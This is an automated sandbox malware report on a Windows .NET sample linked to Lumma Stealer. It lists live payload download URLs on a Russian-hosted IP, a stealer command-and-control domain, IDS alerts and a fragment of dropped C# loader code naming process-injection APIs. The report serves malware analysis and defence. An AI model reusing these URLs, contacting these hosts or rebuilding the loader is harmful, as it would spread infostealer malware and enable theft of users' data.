                            http://147.45.44.131qoqD1RxV0F.exe, 00000000.00000002.2055586170.000000000245B000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              172.67.195.241
                              volcanoyev.clickUnited States
                              13335CLOUDFLARENETUStrue
                              147.45.44.131
                              unknownRussian Federation
                              2895FREE-NET-ASFREEnetEUtrue
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1580260
                              Start date and time:2024-12-24 08:17:06 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 10s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:9
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:qoqD1RxV0F.exe
                              renamed because original name is a hash value
                              Original Sample Name:896078e90b854c34f629d64493e4166a.exe
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winEXE@12/7@1/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 89%
                              • Number of executed functions: 21
                              • Number of non-executed functions: 115
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated
                              • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                              • Excluded IPs from analysis (whitelisted): 172.202.163.200, 23.64.59.120, 23.64.59.136
                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, download.windowsupdate.com.edgesuite.net
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              TimeTypeDescription
                              02:18:00API Interceptor1x Sleep call for process: qoqD1RxV0F.exe modified
                              02:18:07API Interceptor2x Sleep call for process: RegAsm.exe modified
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              172.67.195.241iviewers.dllGet hashmaliciousLummaCBrowse
                                Voice_Message.htmlGet hashmaliciousHTMLPhisherBrowse
                                  147.45.44.131iviewers.dllGet hashmaliciousLummaCBrowse
                                  • 147.45.44.131/infopage/inbg.exe
                                  Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                  • 147.45.44.131/infopage/bnkh.exe
                                  htZgRRla8S.exeGet hashmaliciousLummaC StealerBrowse
                                  • 147.45.44.131/infopage/ung0.exe
                                  Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                  • 147.45.44.131/infopage/ilk.exe
                                  Captcha.htaGet hashmaliciousHTMLPhisherBrowse
                                  • 147.45.44.131/infopage/bgfi.ps1
                                  Captcha.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                  • 147.45.44.131/infopage/ung0.exe
                                  EBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
                                  • 147.45.44.131/infopage/vsom.exe
                                  MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                                  • 147.45.44.131/infopage/Tom.exe
                                  ZjH6H6xqo7.exeGet hashmaliciousLummaCBrowse
                                  • 147.45.44.131/infopage/tvh53.exe
                                  nlJ2sNaZVi.exeGet hashmaliciousLummaCBrowse
                                  • 147.45.44.131/infopage/tbh75.exe
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  volcanoyev.clickiviewers.dllGet hashmaliciousLummaCBrowse
                                  • 172.67.195.241
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  CLOUDFLARENETUStxUcQFc0aJ.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.151.61
                                  hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                  • 172.65.251.78
                                  nabarm5.elfGet hashmaliciousUnknownBrowse
                                  • 8.6.115.225
                                  nklmips.elfGet hashmaliciousUnknownBrowse
                                  • 104.29.132.180
                                  eCompleted_419z.pdfGet hashmaliciousUnknownBrowse
                                  • 104.18.95.41
                                  Setup.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.177.88
                                  Adobe GenP 5.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.29.252
                                  Setup_W.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.44.57
                                  iviewers.dllGet hashmaliciousLummaCBrowse
                                  • 172.67.195.241
                                  Loader.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.145.201
                                  FREE-NET-ASFREEnetEUiviewers.dllGet hashmaliciousLummaCBrowse
                                  • 147.45.44.131
                                  Collapse.exeGet hashmaliciousLummaCBrowse
                                  • 147.45.47.81
                                  nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                  • 147.45.49.155
                                  7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                  • 147.45.49.155
                                  6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                  • 147.45.49.155
                                  FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                  • 147.45.49.155
                                  lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                  • 147.45.49.155
                                  jqplot.htaGet hashmaliciousUnknownBrowse
                                  • 147.45.112.248
                                  KNkr78hyig.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • 147.45.113.159
                                  Tsy9P2T9yF.exeGet hashmaliciousUnknownBrowse
                                  • 147.45.113.159
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  a0e9f5d64349fb13191bc781f81f42e1txUcQFc0aJ.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.195.241
                                  Setup.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.195.241
                                  Adobe GenP 5.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.195.241
                                  Setup_W.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.195.241
                                  iviewers.dllGet hashmaliciousLummaCBrowse
                                  • 172.67.195.241
                                  Loader.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.195.241
                                  Collapse.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.195.241
                                  Setup.exeGet hashmaliciousLummaC StealerBrowse
                                  • 172.67.195.241
                                  AxoPac.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.195.241
                                  Setup.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.195.241
                                  No context
                                  Process:C:\Users\user\Desktop\qoqD1RxV0F.exe
                                  File Type:CSV text
                                  Category:dropped
                                  Size (bytes):847
                                  Entropy (8bit):5.345615485833535
                                  Encrypted:false
                                  SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                  MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                  SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                  SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                  SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                  Malicious:true
                                  Reputation:moderate, very likely benign file
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Tue Dec 24 08:52:13 2024, 1st section name ".debug$S"
                                  Category:dropped
                                  Size (bytes):1336
                                  Entropy (8bit):3.950834142300887
                                  Encrypted:false
                                  SSDEEP:24:Hsm9p0ZMCjHCwKTFexmfwI+ycuZhN0wakSf1PNnqSSd:D/K5KTAxmo1ul0wa3fvqSC
                                  MD5:7ACAF1F48F6C8B8E517B1484E2EC7EE7
                                  SHA1:B11F2C4D6B2B9E3764886E4375DE54D27F01DF5A
                                  SHA-256:C62E903C0B024FA815EC468D72C3E029885A905AD87107B931D6F92126B05102
                                  SHA-512:9270E706347FEEB804B06C6F302ECC5D91A05C6395596E613FA4EA116A19685BE8B0227E8E7ED2DC434EA2CFB7FE607F9DDE13ECC6118606B0BD3BE6177A4FB3
                                  Malicious:false
                                  Reputation:low
                                  Preview:L...=vjg.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\ldukos0s\CSCAE8F24CA40C840259D2783B6D24C303E.TMP...................<.8.\K.*0~l.y............5.......C:\Users\user\AppData\Local\Temp\RES634D.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.d.u.k.o.s.0.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                  File Type:MSVC .res
                                  Category:dropped
                                  Size (bytes):652
                                  Entropy (8bit):3.0778686725239806
                                  Encrypted:false
                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyWTak7YnqqfW8PN5Dlq5J:+RI+ycuZhN0wakSf1PNnqX
                                  MD5:2E3C0E38D55C4BF32A307E6C8279FAB4
                                  SHA1:0E6AC104755FAABB0CCA4D49E43FDFDEFFDCFDBF
                                  SHA-256:A683CF2B3B82F6B32B7AFA59E101017FE5397B698637BC055492BC29247CFEED
                                  SHA-512:977E9564BC73E182546AF31D60D67C7E66D53CD995E910496AAB61162EE5740E07667665381EBB51E5525EAE1D00155A17CD34436367B040DBE22E3DC24A05C4
                                  Malicious:false
                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.d.u.k.o.s.0.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.d.u.k.o.s.0.s...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                  Process:C:\Users\user\Desktop\qoqD1RxV0F.exe
                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):10583
                                  Entropy (8bit):4.487855797297623
                                  Encrypted:false
                                  SSDEEP:192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
                                  MD5:B022C6FE4494666C8337A975D175C726
                                  SHA1:8197D4A993E7547D19D7B067B4D28EBE48329793
                                  SHA-256:D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
                                  SHA-512:DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
                                  Malicious:true
                                  Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..
                                  Process:C:\Users\user\Desktop\qoqD1RxV0F.exe
                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                  Category:dropped
                                  Size (bytes):206
                                  Entropy (8bit):4.897692781853875
                                  Encrypted:false
                                  SSDEEP:3:0HXEXA8F+H2R5BJiWR5mKWLRRUkh4E2J5xAIUlLIDaiQCIFRVRMxTPIUkh4E2J5P:pAu+H2L/6K2923fDGzxszI923fDQA
                                  MD5:DF45EFDB1B22B6F6784672857665DF24
                                  SHA1:4672FA0230791B8AA698E8F5AE36D6A4E7182AD4
                                  SHA-256:FE7CB0057988161B7F4BB7A71B7991219E2AD42E523EC4F53CD371BDB363AB9E
                                  SHA-512:1EB324C015B44F2AED6B0003833CDF5A88E75977EE6AF1E4152FD4B3672BC353C2FA10BA84E92274491AD601E66302FC6BA849A17020418AA96438E1F6E35DC6
                                  Malicious:true
                                  Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.0.cs"
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):8704
                                  Entropy (8bit):4.659575595866915
                                  Encrypted:false
                                  SSDEEP:96:5buaQZGQf9xPQ2pCa/u67hHJL9IhbpPrjzKcaEZR7H0ljILHqrv5MqLTzeNc+iiR:5CaQHf9WDa/u64Rj2cacUxd5MqDeNcE
                                  MD5:79893D07C2DE62F353046EA7264F7177
                                  SHA1:37E1AC3F6C30077E88C91A2E9BA3FA7CAF197F02
                                  SHA-256:342CA38C616242F4A78446856912985F0CC72F6ABC90298F156F4CC8A3AA8850
                                  SHA-512:D6252A25FFA2238CC758B054E8FF50DB8B06570F889B7857E5E340DA17A7E0B806B779F257006B0DDD100A0E5481C3CD6CD561C5F115B853531E6CD5AC6C0FBE
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=vjg...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......
                                  Process:C:\Users\user\Desktop\qoqD1RxV0F.exe
                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                  Category:modified
                                  Size (bytes):705
                                  Entropy (8bit):5.193329232731192
                                  Encrypted:false
                                  SSDEEP:12:KMi/qR37L/6Kz6wGKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoqdn6KzfGKax5DqBVKVrdFAMBJTH
                                  MD5:8307DF30AC2E8076F891858340D9E612
                                  SHA1:CDC992E1DA81A08AC4E9682789F15BD7462A016D
                                  SHA-256:2FB776C0543A57DEBC262A6E6CFF5F6FA2B40A940F03CD9DFA2669374797E5CB
                                  SHA-512:754A58D2B23C60954DEF4DB1001EC563D68FA0F4BC4CEA840029CF6DD5820874B2E7F6068978011561DDF2789DEA63BB50A5ACB25DDD888057D478C08BF7F00A
                                  Malicious:false
                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):3.911496620175994
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  File name:qoqD1RxV0F.exe
                                  File size:44'544 bytes
                                  MD5:896078e90b854c34f629d64493e4166a
                                  SHA1:5037da5e892d2dee9537195dc8b2917591c5357d
                                  SHA256:d9f50f7ece15d4decb568deb5afa024dee677bfb436408ea2fdf3297415d6978
                                  SHA512:bae675d091022bda22035c7ccafba880a388177fee1d6e316deb5f470caa8f5171fd1626c41230c44189a4d5ad8efb92dea4e9a03a04f9767fa40350e07eee2a
                                  SSDEEP:768:Iy3KNSVwafevGHkiV++I1gqDnJuuAuznQVLNvxu0BvkwIt6BcN4feo:IcKN7aeGEk+11Tu9AnQVLNppvk9RN4Go
                                  TLSH:3413595175FEA029D5BBEBB5BEDDACEDC89E5971182C245700C1928B4B21FE0EA43C34
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y............."...0.................. ........@.. ....................... ............`................................
                                  Icon Hash:00928e8e8686b000
                                  Entrypoint:0x40c2fe
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x9484AD59 [Wed Dec 16 09:18:17 2048 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xc2ac0x4f.text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xe0000x5ec.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x100000xc.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xc2900x1c.text
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x20000xa3040xa4008de5c625f88260bcd85d17cfc696330eFalse0.23844798018292682data3.8929138851174194IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rsrc0xe0000x5ec0x600e3f097869bc449d2cc1b26c6ce48e7fcFalse0.4212239583333333data4.206636481847414IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x100000xc0x200f6f5eff7bfbddef7681d54418931523dFalse0.041015625data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_VERSION0xe0900x35cdata0.40232558139534885
                                  RT_MANIFEST0xe3fc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                  DLLImport
                                  mscoree.dll_CorExeMain
                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-12-24T08:17:59.259674+01002859377ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET)1192.168.2.549704147.45.44.13180TCP
                                  2024-12-24T08:18:02.509976+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705172.67.195.241443TCP
                                  2024-12-24T08:18:08.381085+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549705172.67.195.241443TCP
                                  2024-12-24T08:18:08.381085+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705172.67.195.241443TCP
                                  2024-12-24T08:18:08.905028+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706172.67.195.241443TCP
                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 24, 2024 08:17:57.879035950 CET4970480192.168.2.5147.45.44.131
                                  Dec 24, 2024 08:17:57.998908997 CET8049704147.45.44.131192.168.2.5
                                  Dec 24, 2024 08:17:57.999130964 CET4970480192.168.2.5147.45.44.131
                                  Dec 24, 2024 08:17:57.999418974 CET4970480192.168.2.5147.45.44.131
                                  Dec 24, 2024 08:17:58.118930101 CET8049704147.45.44.131192.168.2.5
                                  Dec 24, 2024 08:17:59.259567976 CET8049704147.45.44.131192.168.2.5
                                  Dec 24, 2024 08:17:59.259598017 CET8049704147.45.44.131192.168.2.5
                                  Dec 24, 2024 08:17:59.259613991 CET8049704147.45.44.131192.168.2.5
                                  Dec 24, 2024 08:17:59.259674072 CET4970480192.168.2.5147.45.44.131
                                  Dec 24, 2024 08:17:59.259716988 CET8049704147.45.44.131192.168.2.5
                                  Dec 24, 2024 08:17:59.259732008 CET8049704147.45.44.131192.168.2.5
                                  Dec 24, 2024 08:17:59.259748936 CET8049704147.45.44.131192.168.2.5
                                  Dec 24, 2024 08:17:59.259764910 CET8049704147.45.44.131192.168.2.5
                                  Dec 24, 2024 08:17:59.259773016 CET4970480192.168.2.5147.45.44.131
                                  Dec 24, 2024 08:17:59.259787083 CET8049704147.45.44.131192.168.2.5
                                  Dec 24, 2024 08:17:59.259804964 CET4970480192.168.2.5147.45.44.131
                                  Dec 24, 2024 08:17:59.259860992 CET4970480192.168.2.5147.45.44.131
                                  Dec 24, 2024 08:17:59.260010004 CET8049704147.45.44.131192.168.2.5
                                  Dec 24, 2024 08:17:59.260026932 CET8049704147.45.44.131192.168.2.5
                                  Dec 24, 2024 08:17:59.260072947 CET4970480192.168.2.5147.45.44.131
                                  Dec 24, 2024 08:17:59.379795074 CET8049704147.45.44.131192.168.2.5
                                  Dec 24, 2024 08:17:59.379863024 CET8049704147.45.44.131192.168.2.5
                                  Dec 24, 2024 08:17:59.379926920 CET4970480192.168.2.5147.45.44.131
                                  Dec 24, 2024 08:17:59.451380968 CET8049704147.45.44.131192.168.2.5
                                  Dec 24, 2024 08:17:59.451452971 CET8049704147.45.44.131192.168.2.5
                                  Dec 24, 2024 08:17:59.451518059 CET4970480192.168.2.5147.45.44.131
                                  Dec 24, 2024 08:17:59.455497980 CET8049704147.45.44.131192.168.2.5
                                  Dec 24, 2024 08:17:59.455600977 CET8049704147.45.44.131192.168.2.5
                                  Dec 24, 2024 08:17:59.455661058 CET4970480192.168.2.5147.45.44.131
                                  Dec 24, 2024 08:17:59.463965893 CET8049704147.45.44.131192.168.2.5
                                  Dec 24, 2024 08:17:59.464046955 CET8049704147.45.44.131192.168.2.5
                                  Dec 24, 2024 08:17:59.464112043 CET4970480192.168.2.5147.45.44.131
                                  Dec 24, 2024 08:17:59.472398043 CET8049704147.45.44.131192.168.2.5
